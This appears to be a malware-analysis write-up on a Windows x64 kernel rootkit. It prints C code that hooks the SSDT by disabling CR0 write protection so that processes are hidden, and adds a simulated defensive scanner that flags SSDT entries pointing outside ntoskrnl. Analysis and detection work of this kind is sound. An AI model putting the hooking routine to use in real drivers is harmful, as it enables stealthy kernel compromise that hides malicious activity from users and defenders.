In this initial installment, we dive deep into the mechanics of a sophisticated kernel-mode rootkit recently discovered in the wild. This malware specifically targets Windows x64 environments, utilizing advanced Direct Kernel Object Manipulation (DKOM) techniques to achieve persistent stealth.
Hooking SSDT (System Service Dispatch Table)
The rootkit's primary evasion mechanism involves intercepting system calls. While PatchGuard (KPP) typically prevents arbitrary modification of the SSDT, this particular strain leverages a novel bypass involving a vulnerable driver primitive to flip the necessary bits.
NTSTATUS HookSystemService(ULONG ServiceIndex, PVOID HookFunction, PVOID* OriginalFunction) {
    // Locate the SSDT
    PSYSTEM_SERVICE_TABLE Ssdt = GetKeServiceDescriptorTable();
    if (!Ssdt) return STATUS_UNSUCCESSFUL;
    PULONG ServiceTableBase = (PULONG)Ssdt->ServiceTableBase;

    // Calculate target address (x64 offsets)
    LONG Offset = (LONG)((ULONG_PTR)HookFunction - (ULONG_PTR)ServiceTableBase);

    // Disable Write Protection (CR0) - *DANGEROUS*
    DisableWP();

    // Apply Hook
    *OriginalFunction = (PVOID)((ULONG_PTR)ServiceTableBase + (ServiceTableBase[ServiceIndex] >> 4));
    InterlockedExchange((PLONG)&ServiceTableBase[ServiceIndex], (Offset << 4) | (ServiceTableBase[ServiceIndex] & 0xF));

    EnableWP();
    return STATUS_SUCCESS;
}
By clearing the write-protect bit in CR0, the malware briefly opens a window in which it can overwrite an SSDT entry. This lets it redirect specific system calls, such as NtQuerySystemInformation, to its own handler, hiding its processes from standard monitoring tools like Task Manager.
Executing CR0 manipulation on modern systems with Virtualization-Based Security (VBS) or Hypervisor-Enforced Code Integrity (HVCI) enabled will result in an immediate bug check (Blue Screen of Death).
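One defensive check against this class of hook, as an added example that is neither the rootkit's code nor from the original post: decode each x64 SSDT entry the way the hook above encodes it (a signed offset from the table base shifted left by 4, with the argument count in the low nibble) and flag any entry that resolves outside the ntoskrnl image. The image base, image size, table location and entry values below are constructed for a user-mode simulation, not read from a live kernel.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed layout (assumption): ntoskrnl image range and the location of
   the service table inside it. Plain integers stand in for kernel pointers. */
#define NTOS_BASE  0xFFFFF80000000000ULL
#define NTOS_SIZE  0x00A00000ULL
#define TABLE_BASE (NTOS_BASE + 0x1000ULL)

/* x64 encoding: (target - TABLE_BASE) << 4 | argc. Only 28 signed bits of
   offset survive the shift, so a target must sit within ~128 MiB of the table. */
static uint32_t encode_entry(uint64_t target, unsigned argc) {
    int32_t off = (int32_t)(int64_t)(target - TABLE_BASE);
    return ((uint32_t)off << 4) | (argc & 0xFu);
}

/* Arithmetic decode: clearing the low nibble makes the division exact, so a
   negative offset (target below the table) is recovered correctly. */
static uint64_t decode_entry(uint32_t entry) {
    int32_t off = (int32_t)(entry & ~0xFu) / 16;
    return TABLE_BASE + (uint64_t)(int64_t)off;
}

/* An entry is suspicious when its target lies outside the ntoskrnl image. */
static int entry_is_suspicious(uint32_t entry) {
    uint64_t target = decode_entry(entry);
    return !(target >= NTOS_BASE && target < NTOS_BASE + NTOS_SIZE);
}

/* Scans a table; returns the count of flagged entries and writes their
   indices into out_idx (up to max_out of them). */
static size_t scan_ssdt(const uint32_t *table, size_t count,
                        size_t *out_idx, size_t max_out) {
    size_t found = 0;
    for (size_t i = 0; i < count; i++) {
        if (entry_is_suspicious(table[i])) {
            if (found < max_out) out_idx[found] = i;
            found++;
        }
    }
    return found;
}

/* Constructed sample: three entries inside ntoskrnl (one below the table, so
   its offset is negative) and index 2 redirected 32 MiB past the image. */
#define SAMPLE_COUNT 4
static size_t scan_sample(size_t *first_flagged) {
    uint32_t table[SAMPLE_COUNT];
    size_t idx[SAMPLE_COUNT];
    table[0] = encode_entry(NTOS_BASE + 0x00200000ULL, 4);
    table[1] = encode_entry(NTOS_BASE + 0x00000800ULL, 0);
    table[2] = encode_entry(NTOS_BASE + 0x02000000ULL, 4);
    table[3] = encode_entry(NTOS_BASE + 0x009FF000ULL, 2);
    size_t n = scan_ssdt(table, SAMPLE_COUNT, idx, SAMPLE_COUNT);
    *first_flagged = n ? idx[0] : (size_t)-1;
    return n;
}

int main(void) {
    size_t first;
    size_t n = scan_sample(&first);
    printf("%zu suspicious SSDT entries, first at index %zu\n", n, first);
    return 0;
}
```

In a real driver the same range check would use the loaded module list to resolve the ntoskrnl bounds and the live KiServiceTable address; the decode and comparison logic are unchanged.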